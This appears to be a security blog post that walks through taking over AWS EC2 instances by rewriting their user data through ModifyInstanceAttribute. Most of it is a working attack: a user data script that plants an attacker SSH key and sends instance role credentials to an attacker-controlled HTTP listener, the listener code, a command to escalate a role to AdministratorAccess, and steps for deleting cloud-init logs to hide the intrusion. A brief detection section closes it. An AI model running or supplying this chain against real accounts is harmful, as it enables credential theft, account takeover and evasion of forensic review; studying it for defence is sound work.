The Dangers of ModifyInstanceAttribute

Instance takeover and credential exfiltration using ModifyInstanceAttribute

Harsha Koushik
Kernel Space
5 min read · Apr 29, 2024


Introduction

We will explore how a simple action like ModifyInstanceAttribute, which is not considered a privileged action in most cases, can be used to take over instances, exfiltrate instance role credentials, and possibly take over the entire AWS account.

A good understanding of IMDSv1 and IMDSv2 (HTTP token authentication, the metadata endpoints, and the PUT response hop limit) helps a lot while you read this.

What can be done using ModifyInstanceAttribute?

As the API name suggests, it is used to modify instance attributes. The list of instance attributes this API allows you to modify is here:

https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ModifyInstanceAttribute.html

Our interest and scope is mostly the userData attribute and, optionally, the groups attribute. The userData attribute updates the user data of the instance, which is normally used to install software while the instance boots up, but we will use it to persist on the EC2 instance and exfiltrate its role creds.

Note: An EC2 instance needs to be in a stopped state before its userData attribute can be modified.

Exploiting ModifyInstanceAttribute

Attack Sequence Visualized

The attack sequence is:

  1. Stop the instance.
  2. Modify the user data of the EC2 instance.
  3. Start the instance.
  4. The creds are exfiltrated to an HTTP endpoint on the attacker server.
  5. Decode the creds, optionally persist, and clear the tracks.

Infra & Permissions Required to test this:

  1. One EC2 instance with a role attached. This works for both IMDSv1 and IMDSv2, so either version can be enabled.
  2. One more EC2 instance as the attacker server, where an HTTP server listens for creds and stores them in a file.
  3. A simple user access key with ec2:StartInstances, ec2:StopInstances and ec2:ModifyInstanceAttribute. We will be using this user to make the API calls, to demonstrate that these are the only permissions required to take over any instance and its role credentials (a sketch of the policy follows).
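
A minimal sketch of the IAM policy behind that access key, assuming no resource scoping for brevity (everything here is illustrative):

{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Action": [
      "ec2:StartInstances",
      "ec2:StopInstances",
      "ec2:ModifyInstanceAttribute"
    ],
    "Resource": "*"
  }]
}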

Once the infra and the access key are ready, export the access key and secret key in your environment and make an STS get-caller-identity call to ensure the creds are working.
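
For example:

export AWS_ACCESS_KEY_ID=<access-key-id>
export AWS_SECRET_ACCESS_KEY=<secret-access-key>
aws sts get-caller-identity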

Action

  1. Stop the victim server, the EC2 instance which we want to take over and exfiltrate credentials from:
aws ec2 stop-instances --instance-ids <instance-id> --region <region>

2. Modify the user data script accordingly: replace the SSH key with your public key, and replace the attacker-server IP with the IP of your server where the HTTP server is running.

IMDSv2: for v2, we will query a token and use it to make the metadata calls.
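
A minimal sketch of such a user data script, assuming bash and curl on the instance and an ec2-user home directory; the SSH key and attacker IP are placeholders:

#!/bin/bash
# Persistence: append the attacker's public key to authorized_keys.
echo "ssh-rsa AAAA...<attacker-public-key>" >> /home/ec2-user/.ssh/authorized_keys

# IMDSv2: request a session token first, then use it for metadata calls.
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")

# Discover the attached role name and fetch its temporary credentials.
ROLE=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/)
CREDS=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" "http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE")

# Exfiltrate the credentials, Base64-encoded, to the attacker's HTTP listener on port 8000.
curl -s -X POST -d "$(echo "$CREDS" | base64 -w0)" http://<attacker-server-ip>:8000/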

IMDSv1: the same script, without using the token.
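
The tail end of the v1 variant, under the same assumptions:

# IMDSv1: the metadata endpoint answers plain GETs, no token needed.
ROLE=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/)
CREDS=$(curl -s "http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE")
curl -s -X POST -d "$(echo "$CREDS" | base64 -w0)" http://<attacker-server-ip>:8000/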

3. Save this script as userdata.txt.

4. Convert this file into Base64.

cat userdata.txt | base64 > ud.txt

5. Modify the userData instance attribute once the instance is in a stopped state:

aws ec2 modify-instance-attribute --attribute userData --value file://ud.txt --instance-id <instance-id> --region <region>

6. On the attacker VM, run the following script, and ensure port 8000 is open to the victim EC2's IP (or to 0.0.0.0/0, however you want it running).
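
A minimal sketch of what server.py might look like, using only Python's standard library (illustrative, not the exact script):

#!/usr/bin/env python3
# Tiny HTTP listener: append every POST body to data.txt.
from http.server import BaseHTTPRequestHandler, HTTPServer

class CredHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length).decode()
        with open("data.txt", "a") as f:
            f.write(body + "\n")
        self.send_response(200)
        self.end_headers()

HTTPServer(("0.0.0.0", 8000), CredHandler).serve_forever()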

python3 server.py &

7. Start the EC2 instance now and keep an eye on the attacker EC2; it should receive the credentials in Base64 format, saved into the data.txt file.
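
The start call mirrors the stop call from step 1:

aws ec2 start-instances --instance-ids <instance-id> --region <region>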

8. Decode the creds and load them into your environment:

cat data.txt | base64 -d > creds.json
export AWS_ACCESS_KEY_ID=$(cat creds.json | jq -r '.AccessKeyId')
export AWS_SECRET_ACCESS_KEY=$(cat creds.json | jq -r '.SecretAccessKey')
export AWS_SESSION_TOKEN=$(cat creds.json | jq -r '.Token')

9. Perform an STS call and confirm they are indeed the role creds of the EC2 instance we extracted them from:

aws sts get-caller-identity

10. Optionally, you can also try SSHing into the instance using your private key, a common persistence tactic.

Note: We can use the groups attribute of ModifyInstanceAttribute to replace the instance's security groups with a specified security group, in case SSH is not whitelisted and we do not have the permission to authorize an ingress rule.
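
A sketch of that call; the security group ID is a placeholder for one we control that allows SSH:

aws ec2 modify-instance-attribute --instance-id <instance-id> --groups <sg-id-allowing-ssh> --region <region>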

Possibility of Account Takeover

Using this tactic, we will be able to take over any instance within the account, provided we have the necessary permissions and the EC2 instance has a role attached.

We can exploit instances that are in a stopped state as well, as long as they have a role attached. The steps would simply be to modify the user data, start the instance, and then stop the instance again to return it to its original state.

Chances are high, if we are lucky, that at least a few instances in the account will have higher privileges. Think of instances whose roles have permissions like iam:AttachRolePolicy or iam:AttachUserPolicy, or PowerUserAccess or, in the best case scenario, admin access attached xD.
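
With the stolen creds loaded in the environment, checking for and abusing such a role is a couple of calls; a sketch, with the role name as a placeholder:

# See what the stolen role can do.
aws iam list-attached-role-policies --role-name <victim-instance-role>

# If the role can attach policies, escalate straight to admin.
aws iam attach-role-policy --role-name <victim-instance-role> --policy-arn arn:aws:iam::aws:policy/AdministratorAccess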

Clearing the Tracks


The places where what we did would be logged are:

  1. CloudTrail: the ModifyInstanceAttribute call with the userData attribute will be logged, but the user data content itself is redacted by CloudTrail.
  2. The instance's cloud-init logs (cloud-init.log and cloud-init-output.log); we can remove these files using the same user data script, just appending rm <these files> at the end.
  3. The user data is also stored in four locations, from what I observed:
    a. /var/lib/cloud/instances/<instance-id>/user-data.txt
    b. /var/lib/cloud/instances/<instance-id>/user-data.txt.i
    c. /var/lib/cloud/instance/user-data.txt
    d. /var/lib/cloud/instance/user-data.txt.i
  4. Apart from the files storing it, the metadata endpoint also serves the current user data; it can be queried using:

curl http://169.254.169.254/latest/user-data

To clear the tracks, we can delete those log files on the instance and empty the user data: stop the instance, empty the user data, and start the instance again.
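
A sketch of the cleanup lines to append at the end of the user data script, using the paths listed above:

# Remove cloud-init logs and the on-disk copies of the user data.
rm -f /var/log/cloud-init.log /var/log/cloud-init-output.log
rm -f /var/lib/cloud/instance/user-data.txt /var/lib/cloud/instance/user-data.txt.i
rm -f /var/lib/cloud/instances/*/user-data.txt /var/lib/cloud/instances/*/user-data.txt.i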

If you find any other place where the user data can be found, I would be curious to know; do comment.

Automation

We can create a simple script to automate this flow.

  1. List all the EC2 instances which have a role attached, in both stopped and running states (see the sketch after this list).
  2. Filter for privileged roles and categorize the instances by IMDSv1 and v2.
  3. List the security groups which allow port 22 from 0.0.0.0/0, and map which of them are already attached to the EC2 instances from our filter.
  4. Launch the attack: steal the creds, persist via SSH, and optionally clear the tracks.
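
A sketch of step 1, assuming the default CLI profile and region; HttpTokens is "required" on IMDSv2-only instances and "optional" where v1 still answers:

# Instances with an instance profile attached: ID, state, IMDS mode, profile ARN.
aws ec2 describe-instances --output text --query 'Reservations[].Instances[?IamInstanceProfile!=`null`].[InstanceId, State.Name, MetadataOptions.HttpTokens, IamInstanceProfile.Arn]'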

Detection & Prevention

  1. Monitor ModifyInstanceAttribute calls, if you are not already doing so.
  2. It is better to monitor ModifyInstanceMetadataOptions too, which can downgrade IMDSv2 to v1. Even though enforcing v2 makes plain v1 requests invalid, as mentioned in this article the attack works against both versions, so it is better to monitor failed calls as well.
  3. We can restore cloud-init to its defaults, ensuring it does not run the user script every time the instance restarts, as discussed here: https://repost.aws/knowledge-center/execute-user-data-ec2
  4. It is better to control the cred usage by, for example, adding conditions on where the creds can be used from (a sketch follows).
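
A sketch of such a deny condition, following the common block-outside-the-network pattern; the CIDR is a placeholder, and aws:ViaAWSService keeps calls made on our behalf by AWS services working:

{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Deny",
    "Action": "*",
    "Resource": "*",
    "Condition": {
      "NotIpAddress": {"aws:SourceIp": ["203.0.113.0/24"]},
      "Bool": {"aws:ViaAWSService": "false"}
    }
  }]
}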

Refs:
https://repost.aws/knowledge-center/execute-user-data-ec2
https://hackingthe.cloud/aws/exploitation/local_ec2_priv_esc_through_user_data/#ec2modifyinstanceattribute
https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ModifyInstanceAttribute.html

Please feel free to point out mistakes if there are any. Thank you for reading. You can connect with me on LinkedIn / Twitter. Happy to answer your queries.
